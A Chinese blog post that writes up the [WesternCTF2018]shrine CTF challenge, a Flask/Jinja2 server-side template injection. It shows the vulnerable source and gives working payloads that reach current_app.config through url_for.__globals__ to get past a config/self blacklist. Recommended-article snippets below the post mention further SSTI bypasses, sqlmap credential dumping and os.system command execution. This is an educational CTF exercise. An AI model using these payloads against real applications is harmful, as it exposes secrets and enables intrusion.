一天一道ctf 第31天(flask模板注入)

最新推荐文章于 2025-07-19 09:00:00 发布
原创 最新推荐文章于 2025-07-19 09:00:00 发布 · 2.2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了如何利用SSTI漏洞在Web应用中执行代码,通过flask框架解析模板时的漏洞,尝试获取并展示FLAG。解题关键在于理解模板注入原理和避开黑名单。

[WesternCTF2018]shrine1
题目源码:

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

网上的解法都是大同小异,我在这里也仅作记录,后面有了更好的理解再回来补。
关于flask的简单介绍可以看这篇文章,读懂这道题的代码够了。
https://www.cnblogs.com/chaojiyingxiong/p/9549987.html
这道题是SSTI模板注入,简单理解下就是一些特殊情况数据会被当做代码来执行,而且得是{{}}里面的数据才行。在源码里可以看到@app.route('/shrine/<path:shrine>'),试着在URL后面加上/shrine/{{7*7}}/shrine/{{7*'7'}},可以看到算式被执行了
在这里插入图片描述
在这里插入图片描述
再在源码里找到app.config['FLAG'] = os.environ.pop('FLAG'),用os.environ取出Linux系统中的FLAG变量赋值给了app.config,猜测执行config就能得到flag。但是config和self都在黑名单里,而且这里是先替换()再过滤黑名单,没法用con(fig这类绕过。
WP是用了url_for和get_flashed_messages来获取current_app全局变量,current_app是一个flask的实例,算是通过对象之间的引用来获得被禁止对象信息的一种吧。__globals__是python里的函数,可以看到所有可读的全局变量。

/shrine/{{url_for.__globals__['current_app'].config['FLAG']}}

/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

在这里插入图片描述

scrawman
关注
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
2401_83703797的博客
04-07 973
获取属性的方式 Level 1 no waf {{}} 等价于 {%print%}盲注第一 判断出不出网发现不出网尝试写静态文件 请先了解 flask 静态目录概念成功写入static静态目录读取flagcat /app/flag 替换一下过滤引号完全可以替换为 request.args.参数名(get方式)可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)用[] 代替 . 其他方法 参考 获取属性的四种方法过滤了很多关键词编码绕
CTF专题一2021网络WEB题目解析
kali_Ma的博客
10-19 8402
0x01 前言 背景: 2021年10月15日的“中国能源网络安全大赛” 感觉WEB的考点形形色色,其中有1道偏于黑盒测试的简单题目,4道是白盒审计类题目,还有一道是Python的反序列化题目题目名称大致如下: 因为唯一的一道黑盒题目还是文件包含题目,所以将题目源代码全部扒下来了,给大家提供复现环境。(flag自己创建)。 为了感谢广大读者伙伴的支持,准备了以下福利给到大家: [一>获取<一] 1、200多本网络安全系列电子书(该有的都有了) 2、全套工具包(最全中文版,想用哪个用哪个)
BUU CTF web()
0xdawn的博客
04-30 8187
[WesternCTF2018]shrine import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shr...
CTF_Web:从0学习Flask模板注入(SSTI)
AFCC_的博客(Web_Dog)
08-30 6763
0x01 前言 最近在刷题的过程中发现服务端模板注入题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
flask完整一道
weixin_45046212的博客
05-23 254
from flask import * from flask_sqlalchemy import SQLAlchemy #导入captcha 用于生成验证码 from captcha.captcha import captcha #图文混排导包 from flask_uploads import UploadSet, IMAGES, configure_uploads import sys imp...
一天一道ctf 第38(报错模板注入 python沙盒逃逸 pin码生成)
scrawman的博客
07-20 847
[GYCTF2020]FlaskApp 先得到{{7*7}}的base64加密字符串,然后解密,输出no no no,看样子是被过滤了,这里可能有SSTI模板注入,主要是看怎么绕过过滤 随便输入字符串让base64解密报错得到文件位置/usr/local/lib/python3.7/site-packages/flask/app.py {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warni
CTF之服务器端模板注入(SSTI)与赛题
最新发布
Neolock的博客
07-19 1055
服务端模板注入(SSTI)漏洞是由于开发人员将用户输入直接拼接到模板中执行导致的。以Flask框架的Jinja2模板为例,攻击者可通过{{}}语法注入恶意代码。利用魔术方法如__class__、__bases__等可进行沙箱逃逸,最终通过找到包含__builtins__的可利用类(如warnings.catch_warnings)执行系统命令。CTF案例展示了如何逐步利用这些方法获取环境变量中的flag。关键点包括:判断模板引擎类型、回溯类继承关系、绕过字符过滤、最终执行任意命令获取敏感信息。
Flask模板注入编码姿势绕过-CMCTF
as you know, nlp is fantasitc!
04-25 1192
写在前面:通过这次比赛学到flask模板注入几个比较sao的绕过姿势 参考文章如下 ctfflask的ssti xctf高校网络安全挑战赛-华为云专场的MINE2 1、参考MINE2这道题目的一些过滤方法,以及一些替代方法 2、主要是利用attr获得属性,一些其他的编码方式如十六进制编码绕过,unicode编码绕过,格式化字符串绕过以及上面图片中提到的十六进制转字符串绕过 格式化字符串绕过payload ?msg={% print(session|attr("__init__"))|attr("__
CTF笔记 SSTI模板注入
qq_51248658的博客
10-21 1167
这次只是简单的把以前写的题目进行了总结,大致明白了解题步骤,但还是得多积累一些payload,以及绕waf的方法。这个可以去找sstilab通关相关内容进行学习,感觉那上面挺全的。
SSTI模板注入基础(Flask+Jinja2)
qq_55202378的博客
12-22 2429
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。由于python一切皆对象的特性,函数本质上也是对象,也存在类中的一些内置方法和内置属性,所以我们可以执行接下来的操作。是类中的一个内置属性,值是该实例的对应的类。
CTF之路:关于Flask模板注入
zw05011的博客
01-07 6212
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记(1)
2401_84009749的博客
04-12 1615
可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)建议用nssctf在线 https://www.nssctf.cn/problem/13 直接用。完全可以替换为 request.args.参数名(get方式)用[] 代替 . 其他方法 参考 获取属性的四种方法。尝试写静态文件 请先了解 flask 静态目录概念。以下题目我用简洁的payload 绕过。{{}} 等价于 {%print%}通过过滤器 | join 返回变量。通过 |attr()
CTF赛题分析之 Flask 目录穿越
程序员阿飘 的博客
01-09 1890
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
第六十二题——[GYCTF2020]FlaskApp
分享简单的安全技术
05-10 476
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,base64加密页面,题目给出flask提示,猜测使用模板注入 第二步:构建漏洞 在加密页面将{{7+7}}进行base64加密后,将密文使用解密页面解码,发现执行了7+7算法,确定了存在模板注入漏洞。 第三步:获取flag 使用{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %
青少年CTF-Flask1
weixin_49803180的博客
04-04 497
qsnctf 上的题目
CTF中的Flask之bypass
qq_38755190的博客
01-31 2816
前言 继上次发布关于Flask的文章,之后说要结合的例题。今小小的总结一波,当然这就是入门,最近Flask题目也比较火热啊。下面我们开始吧。 存在模板注入漏洞的原因 首先在做题之前,我们先了解一下,存在漏洞的原因,Flask模板注入和大多数的SQL注入的原因差不多,都是因为没有严格的过滤变量导致的,存在变量可控,还有就是一些开发人员对安全的不重视等。当然,存在模板注入漏洞的原因还有使用不固定的模板模板注入的危险也是不容小觑的。 ctf中常见的例题 0x01 :XCTF-web高手区-Confusio
CTF实战(faka注入
Marsper的博客
09-18 1586
CTF实战 SQL注入(faka) 方法一:蚁键注入 首先获取实战链接 访问链接打开,并按上篇文章所学寻找相关post提交处,设法找到注入点,如图,得知付款处即为post提交处 打开burp实行抓包,检测注入点是否正确 将注入点链接抛入sqlmap中寻找准确注入点,找出数据库,爆出后台管理员密码 输入sqlmap.py -u “117.167.136.244:28088/ajax.php?act=selgo” --data “tyid=1” -D faka -T ayangw_config --dum
flask之ssti模版注入从零到入门
Red Rapefruit
08-16 1221
前言 在学习ssti模版注入的时候,发现国内文章对于都是基于python基础之上的,对于基础代码讲的较少,而对于一些从事安全的新手师傅们,可能python只停留在写脚本上,所以上手的时候可能有点难度,毕竟不是搞python flask开发。就本人学习ssti而言,入手有点难度,所以特写此文,对于一些不需要深究python但是需要学习ssti的师傅,本文可能让你对flask的ssti有所了解。 ssti漏洞成因 ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tor
bugku CTF练习:Flask_FileUpload思路
xijieyuan2qi的博客
12-22 2282
https://ctf.bugku.com/challenges/detail/id/204.html 打开页面是这个样子。右键查看源代码。 它提示我说会用Python去执行。太棒了。 选择一张普通图片。点击上传。把流量转到burpsuite上。 把burpsuite上抓到的包发送到重发模块 把图片的内容删除。改成 import os print(os.system('ls -al')) 发现执行了Python,想了一下。应该是Python执行系统命令。 一步...
php的smarty模板注入ctf例题
03-10
总结步骤:解释Smarty模板注入的原理,给出一个CTF例题的示例代码,展示如何构造Payload利用漏洞,并提供相关问题供进一步学习。同时引用相关的参考资料,特别是关于PHP参数处理和SSTI的部分。</think>### ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值